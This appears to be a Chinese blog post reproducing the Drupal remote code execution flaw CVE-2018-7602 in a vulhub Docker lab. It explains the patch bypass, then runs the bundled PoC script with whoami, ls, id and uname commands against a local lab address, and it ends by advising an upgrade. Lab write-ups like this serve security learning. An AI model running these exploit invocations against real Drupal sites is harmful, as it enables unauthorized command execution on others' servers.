Drupal远程代码执行漏洞(CVE-2018-7602)

漏洞原因:源于7600漏洞修复不完全,导致补丁被绕过,,对destination=URL中的URL进行URL编码,会对“#”进行编码2次,绕过sanitiza()函数过滤。
漏洞版本:Drupal 7.x 8.x
一 。首先利用vulhub下载打开drupal下的CVE-2018-7602

命令:docker-compose build(出现镜像问题,直接执行下面代码)
docker-compose up -d

二。进行安装Drupal
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述我这里的账号 和 密码都是drupal

在这里插入图片描述
安装好了

三。利用vulhub中自带的POC,进行漏洞验证及利用
在这里插入图片描述
输入以下命令:
python3 drupa7-CVE-2018-7602.py -c “whoami” drupal drupal http://192.168.5.100:8081/
在这里插入图片描述其中 -c + “命令 这里我填写的whoami” drupal drupal 分别是账号和密码

试试下面:
python3 drupa7-CVE-2018-7602.py -c “ls” drupal drupal http://192.168.5.100:8081/
在这里插入图片描述
python3 drupa7-CVE-2018-7602.py -c “id” drupal drupal http://192.168.5.100:8081/
在这里插入图片描述
python3 drupa7-CVE-2018-7602.py -c "uname -a " drupal drupal http://192.168.5.100:8081/ 内核信息
在这里插入图片描述
四。修复建议
Drupal升级至最新版本

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值